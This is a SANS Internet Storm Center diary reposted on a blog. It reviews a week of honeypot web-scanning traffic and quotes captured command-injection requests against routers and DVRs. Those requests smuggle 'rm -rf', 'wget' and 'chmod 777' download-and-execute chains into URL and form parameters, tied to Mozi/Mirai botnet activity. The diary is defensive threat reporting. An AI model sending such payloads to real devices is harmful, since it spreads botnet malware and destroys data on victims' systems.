Archive for March 21st, 2020

Honeypot – Scanning and Targeting Devices & Services, (Sat, Mar 21st)

I was curious this week to see if my honeypot traffic would increase since a large portion of the world is working from home. Reviewing my honeypot logs, I decided to check what type of filename was mostly targeted (GET/POST/HEAD) by scanners  this past week on any web supported ports (i.e. 80, 81, 8000, etc). This first graph shows overall activity for the past 7 days.

The following graph shows 86 different files picked picked up in the past week. Obviously some are familiar and non malicious (i.e. robot.txt, favicon.ico, etc) but a lot of the others are suspicious (i.e. various nmap nse scripts).

I included a few interesting GET/POST that got captured over this past week but infortunatly, the files listed in here are no longer available for analysis:

This random hostname ( is no longer active. I was able to find information about it on URLhaus [1] matching the same URL.

  • 20200216-112558: data ‘GET /shell?cd /tmp;rm -rf *;wget;sh /tmp/jaws HTTP/1.1rnUser-Agent: Hello, worldrnHost: text/html,application/xhtml xml,application/xml;q=0.9,image/webp,*/*;q=0.8rnConnection: keep-alivernrn’

The file (Mozi) is an ELF (Linux) file use by the Mirai botnet [2].

  • 20200319-222704: data ‘GET /shell?cd+/tmp;rm+-rf+*;wget+;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1rnUser-Agent: Hello, worldrnHost: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8rnConnection: keep-alivernrn’

This IP has been identified as an open proxy used by hackers [3]

  • 20200321-033332: data ‘GET HTTP/1.1rnUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36rnAccept: */*rnAccept-Encoding: gzip, deflaternPragma: no-cachernCache-control: no-cachernCookie: cookie=okrnReferer: closernContent-Length: 0rnrn’

I was able to find information about it on URLhaus [4] matching the same URL and is no longer active.

  • 20200321-070843: data ‘POST /boaform/admin/formPing HTTP/1.1rnUser-Agent: polaris botnetrnAccept: */*rnAccept-Encoding: gzip, deflaternContent-Type: application/x-www-form-urlencodedrnrntarget_addr=;cd /tmp; rm -rf *; wget; chmod 777 n; sh n; rm -rf * /&waninf=1_INTERNET_R_VID_154rnrn’

If you have a Netgear router, make sure it is patched.

  • 20200321-125520: data ‘GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0rnrn’


Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →